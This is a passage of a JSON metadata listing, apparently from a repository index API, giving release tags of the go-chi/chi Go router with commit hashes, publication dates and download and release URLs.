tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/